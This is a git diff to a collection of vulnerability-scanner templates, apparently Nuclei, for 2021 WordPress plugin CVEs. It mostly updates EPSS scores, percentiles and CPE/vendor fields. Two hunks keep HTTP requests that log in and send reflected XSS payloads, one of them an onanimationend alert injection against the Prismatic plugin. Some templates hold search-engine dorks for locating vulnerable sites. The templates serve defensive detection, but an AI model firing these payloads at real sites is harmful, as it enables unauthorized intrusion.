framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml
index ee32319289..f6261cda0f 100644
--- a/http/cves/2021/CVE-2021-24285.yaml
+++ b/http/cves/2021/CVE-2021-24285.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-24285
cwe-id: CWE-89
- epss-score: 0.10831
+ epss-score: 0.12049
cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.94624
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml
index 5127a93553..0cffaa9100 100644
--- a/http/cves/2021/CVE-2021-24287.yaml
+++ b/http/cves/2021/CVE-2021-24287.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00177
cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.54153
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml
index ef03cf8833..48a45fbbf5 100644
--- a/http/cves/2021/CVE-2021-24288.yaml
+++ b/http/cves/2021/CVE-2021-24288.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-601
epss-score: 0.0015
cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.50525
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml
index 3c816aeb9c..209ac4959b 100644
--- a/http/cves/2021/CVE-2021-24291.yaml
+++ b/http/cves/2021/CVE-2021-24291.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00085
cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.35153
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml
index 92192e4638..2707d7a3cc 100644
--- a/http/cves/2021/CVE-2021-24298.yaml
+++ b/http/cves/2021/CVE-2021-24298.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:ibenic:simple_giveaways:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44609
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml
index 01bfff5d9d..39e61c7a4b 100644
--- a/http/cves/2021/CVE-2021-24300.yaml
+++ b/http/cves/2021/CVE-2021-24300.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00302
cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.65712
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml
index 74335ca9c2..6fb3bc421f 100644
--- a/http/cves/2021/CVE-2021-24316.yaml
+++ b/http/cves/2021/CVE-2021-24316.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00246
cpe: cpe:2.3:a:wowthemes:mediumish:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.61827
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml
index 9d3770b9bf..1277647f35 100644
--- a/http/cves/2021/CVE-2021-24320.yaml
+++ b/http/cves/2021/CVE-2021-24320.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44609
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml
index 5c013a115b..5e3b56b329 100644
--- a/http/cves/2021/CVE-2021-24335.yaml
+++ b/http/cves/2021/CVE-2021-24335.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00163
cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\&_auto_mechanic:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.52284
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml
index edeaf856e5..1ecd583719 100644
--- a/http/cves/2021/CVE-2021-24340.yaml
+++ b/http/cves/2021/CVE-2021-24340.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-24340
cwe-id: CWE-89
- epss-score: 0.03382
+ epss-score: 0.02665
cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.89061
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml
index c2a4784b42..047b5b0cb0 100644
--- a/http/cves/2021/CVE-2021-24342.yaml
+++ b/http/cves/2021/CVE-2021-24342.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00102
cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40864
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml
index 78721b329f..c8065cd207 100644
--- a/http/cves/2021/CVE-2021-24347.yaml
+++ b/http/cves/2021/CVE-2021-24347.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2021-24347
cwe-id: CWE-178
- epss-score: 0.96989
+ epss-score: 0.96951
cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.99611
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml
index 57c7ed04d3..734a15b537 100644
--- a/http/cves/2021/CVE-2021-24351.yaml
+++ b/http/cves/2021/CVE-2021-24351.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00145
cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.49646
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml
index 4bdd94c74d..1eade80563 100644
--- a/http/cves/2021/CVE-2021-24358.yaml
+++ b/http/cves/2021/CVE-2021-24358.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00255
cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.62645
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml
index c427d4d6ef..11a228353d 100644
--- a/http/cves/2021/CVE-2021-24364.yaml
+++ b/http/cves/2021/CVE-2021-24364.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00102
cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40864
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml
index cd908c3893..242d65bb12 100644
--- a/http/cves/2021/CVE-2021-24370.yaml
+++ b/http/cves/2021/CVE-2021-24370.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-24370
cwe-id: CWE-434
- epss-score: 0.05489
+ epss-score: 0.06587
cpe: cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.9286
metadata:
max-request: 1
google-query: inurl:“/wp-content/plugins/fancy-product-designer”
diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml
index 0cbcac2eb9..cf8998aec1 100644
--- a/http/cves/2021/CVE-2021-24387.yaml
+++ b/http/cves/2021/CVE-2021-24387.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00145
cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.49646
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml
index 46bd363432..d722d81d6b 100644
--- a/http/cves/2021/CVE-2021-24389.yaml
+++ b/http/cves/2021/CVE-2021-24389.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00158
cpe: cpe:2.3:a:chimpgroup:foodbakery:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.51613
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml
index 54c1b97cea..dc6706b329 100644
--- a/http/cves/2021/CVE-2021-24406.yaml
+++ b/http/cves/2021/CVE-2021-24406.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-601
epss-score: 0.0015
cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.50525
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml
index c9676b23a5..bd35b16d9d 100644
--- a/http/cves/2021/CVE-2021-24407.yaml
+++ b/http/cves/2021/CVE-2021-24407.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00161
cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.52061
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml
index bdddbacec9..73412dcdc1 100644
--- a/http/cves/2021/CVE-2021-24409.yaml
+++ b/http/cves/2021/CVE-2021-24409.yaml
@@ -6,20 +6,26 @@ info:
severity: medium
description: |
The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator
- remediation: Fixed in version 2.8
reference:
- https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf
- https://nvd.nist.gov/vuln/detail/CVE-2021-24409
+ remediation: Fixed in version 2.8
classification:
- cve-id: CVE-2021-24409
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
+ cve-id: CVE-2021-24409
cwe-id: CWE-79
+ epss-score: 0.00188
+ cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.55477
metadata:
max-request: 2
verified: true
publicwww-query: "/wp-content/plugins/prismatic"
- tags: cve,cve2023,wordpress,wp,wp-plugin,xss,prismatic,authenticated
+ framework: wordpress
+ vendor: plugin-planet
+ product: prismatic
+ tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,prismatic,authenticated
http:
- raw:
@@ -29,7 +35,6 @@ http:
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
-
- |
GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1
Host: {{Hostname}}
diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml
index 6e02afa6f7..6e171ea922 100644
--- a/http/cves/2021/CVE-2021-24435.yaml
+++ b/http/cves/2021/CVE-2021-24435.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0014
cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.48875
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml
index 46dae21b30..0cda7ed618 100644
--- a/http/cves/2021/CVE-2021-24436.yaml
+++ b/http/cves/2021/CVE-2021-24436.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40466
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml
index c38da3d0ce..465c233b87 100644
--- a/http/cves/2021/CVE-2021-24452.yaml
+++ b/http/cves/2021/CVE-2021-24452.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40466
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml
index dfb849d2f5..6a7cedad7a 100644
--- a/http/cves/2021/CVE-2021-24472.yaml
+++ b/http/cves/2021/CVE-2021-24472.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-24472
cwe-id: CWE-918
- epss-score: 0.01878
+ epss-score: 0.02619
cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.88968
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml
index 67035d4739..843c534778 100644
--- a/http/cves/2021/CVE-2021-24488.yaml
+++ b/http/cves/2021/CVE-2021-24488.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00302
cpe: cpe:2.3:a:pickplugins:post_grid:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.65712
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml
index 32be649c09..f6165228c8 100644
--- a/http/cves/2021/CVE-2021-24495.yaml
+++ b/http/cves/2021/CVE-2021-24495.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44609
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml
index 34edbb7781..edd39ff610 100644
--- a/http/cves/2021/CVE-2021-24498.yaml
+++ b/http/cves/2021/CVE-2021-24498.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00188
cpe: cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.55477
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml
index a231e890df..258b781798 100644
--- a/http/cves/2021/CVE-2021-24499.yaml
+++ b/http/cves/2021/CVE-2021-24499.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-434
epss-score: 0.19069
cpe: cpe:2.3:a:amentotech:workreap:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.95597
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml
index 5f1366f287..31c3508b41 100644
--- a/http/cves/2021/CVE-2021-24510.yaml
+++ b/http/cves/2021/CVE-2021-24510.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00143
cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:*:*:*:*:wordpress:*:*:*
+ epss-percentile: 0.49453
metadata:
max-request: 2
vendor: mf_gig_calendar_project
diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml
index dd89972d67..1d58776b4f 100644
--- a/http/cves/2021/CVE-2021-24554.yaml
+++ b/http/cves/2021/CVE-2021-24554.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2021-24554
cwe-id: CWE-89
- epss-score: 0.13355
+ epss-score: 0.13127
cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.94817
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml
index 3c3a340369..eecd8276b1 100644
--- a/http/cves/2021/CVE-2021-24647.yaml
+++ b/http/cves/2021/CVE-2021-24647.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-287
epss-score: 0.2135
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.9579
metadata:
max-request: 3
verified: "true"
diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml
index de022f141e..34c6f6bc07 100644
--- a/http/cves/2021/CVE-2021-24666.yaml
+++ b/http/cves/2021/CVE-2021-24666.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-89
epss-score: 0.20933
cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.95759
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml
index 72006344d1..52c2c08e34 100644
--- a/http/cves/2021/CVE-2021-24731.yaml
+++ b/http/cves/2021/CVE-2021-24731.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-24731
cwe-id: CWE-89
- epss-score: 0.134
+ epss-score: 0.17893
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.95474
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml
index 508e8f6be2..124d030b55 100644
--- a/http/cves/2021/CVE-2021-24746.yaml
+++ b/http/cves/2021/CVE-2021-24746.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00119
cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45304
metadata:
max-request: 2
google-query: inurl:"/wp-content/plugins/sassy-social-share"
diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml
index 169f1aaf9f..6b03e8d439 100644
--- a/http/cves/2021/CVE-2021-24750.yaml
+++ b/http/cves/2021/CVE-2021-24750.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2021-24750
cwe-id: CWE-89
- epss-score: 0.00776
+ epss-score: 0.00791
cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.79355
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml
index 1c0ae948b7..d7d14c2f64 100644
--- a/http/cves/2021/CVE-2021-24762.yaml
+++ b/http/cves/2021/CVE-2021-24762.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-24762
cwe-id: CWE-89
- epss-score: 0.00893
+ epss-score: 0.00848
cpe: cpe:2.3:a:getperfectsurvey:perfect_survey:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.80045
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml
index 3cfea99f76..823cbecb60 100644
--- a/http/cves/2021/CVE-2021-24827.yaml
+++ b/http/cves/2021/CVE-2021-24827.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-24827
cwe-id: CWE-89
- epss-score: 0.09926
+ epss-score: 0.17594
cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.95442
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml
index 5f59e0f82c..8c81550e41 100644
--- a/http/cves/2021/CVE-2021-24838.yaml
+++ b/http/cves/2021/CVE-2021-24838.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-24838
cwe-id: CWE-601
- epss-score: 0.00141
+ epss-score: 0.00106
cpe: cpe:2.3:a:bologer:anycomment:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.42451
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml
index bca1b92a42..6a3f5054ba 100644
--- a/http/cves/2021/CVE-2021-24862.yaml
+++ b/http/cves/2021/CVE-2021-24862.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2021-24862
cwe-id: CWE-89
- epss-score: 0.53036
+ epss-score: 0.61777
cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.97374
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml
index dd5641a7c0..45d241e6e2 100644
--- a/http/cves/2021/CVE-2021-24875.yaml
+++ b/http/cves/2021/CVE-2021-24875.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00143
cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.49453
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml
index 9ea9e284be..54c95a8e1d 100644
--- a/http/cves/2021/CVE-2021-24891.yaml
+++ b/http/cves/2021/CVE-2021-24891.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44609
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml
index 4d93c86189..5e68dfe34d 100644
--- a/http/cves/2021/CVE-2021-24910.yaml
+++ b/http/cves/2021/CVE-2021-24910.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-24910
cwe-id: CWE-79
- epss-score: 0.00083
+ epss-score: 0.00097
cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.39802
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml
index eb0df77a20..2b206d81ce 100644
--- a/http/cves/2021/CVE-2021-24917.yaml
+++ b/http/cves/2021/CVE-2021-24917.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-24917
cwe-id: CWE-863
- epss-score: 0.03765
+ epss-score: 0.04226
cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.91138
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml
index f91773965f..6cb926644e 100644
--- a/http/cves/2021/CVE-2021-24926.yaml
+++ b/http/cves/2021/CVE-2021-24926.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-24926
cwe-id: CWE-79
- epss-score: 0.00201
+ epss-score: 0.00171
cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.53541
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml
index c0ed028cb6..c37df90d70 100644
--- a/http/cves/2021/CVE-2021-24931.yaml
+++ b/http/cves/2021/CVE-2021-24931.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-24931
cwe-id: CWE-89
- epss-score: 0.04182
+ epss-score: 0.12212
cpe: cpe:2.3:a:ays-pro:secure_copy_content_protection_and_content_locking:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.94654
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml
index e67d952c8f..3f0e5dd14b 100644
--- a/http/cves/2021/CVE-2021-24940.yaml
+++ b/http/cves/2021/CVE-2021-24940.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-24940
cwe-id: CWE-79
- epss-score: 0.00119
+ epss-score: 0.00141
cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.49173
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml
index 0f4b96d116..9665593dc4 100644
--- a/http/cves/2021/CVE-2021-24946.yaml
+++ b/http/cves/2021/CVE-2021-24946.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-24946
cwe-id: CWE-89
- epss-score: 0.038
+ epss-score: 0.05911
cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.92472
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml
index 1492831cdb..67f6133cb7 100644
--- a/http/cves/2021/CVE-2021-24947.yaml
+++ b/http/cves/2021/CVE-2021-24947.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2021-24947
cwe-id: CWE-352,CWE-863
- epss-score: 0.00406
+ epss-score: 0.00444
cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.71723
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24956.yaml b/http/cves/2021/CVE-2021-24956.yaml
index 9505e9b7cf..57e1831c7b 100644
--- a/http/cves/2021/CVE-2021-24956.yaml
+++ b/http/cves/2021/CVE-2021-24956.yaml
@@ -6,15 +6,24 @@ info:
severity: medium
description: |
The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.
- remediation: Fixed in version 6.8.7
reference:
- https://wpscan.com/vulnerability/5882ea89-f463-4f0b-a624-150bbaf967c2
- https://nvd.nist.gov/vuln/detail/CVE-2021-24956
+ remediation: Fixed in version 6.8.7
classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
cve-id: CVE-2021-24956
+ cwe-id: CWE-79
+ epss-score: 0.00106
+ cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.42451
metadata:
max-request: 2
verified: true
+ framework: wordpress
+ vendor: adenion
+ product: blog2social
tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan
http:
@@ -25,12 +34,12 @@ http:
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
-
- |
GET /wp-admin/admin.php?page=blog2social&b2sShowByDate="> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
+
matchers-condition: and
matchers:
- type: word
diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml
index 4994c704f4..94097db836 100644
--- a/http/cves/2021/CVE-2021-24970.yaml
+++ b/http/cves/2021/CVE-2021-24970.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2021-24970
cwe-id: CWE-22
- epss-score: 0.02573
+ epss-score: 0.02825
cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.89345
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml
index 84ddfa7e89..9daeddac3f 100644
--- a/http/cves/2021/CVE-2021-24987.yaml
+++ b/http/cves/2021/CVE-2021-24987.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00097
cpe: cpe:2.3:a:heateor:super_socializer:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.39802
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24991.yaml b/http/cves/2021/CVE-2021-24991.yaml
index 2c3e4fc753..468204ccc7 100644
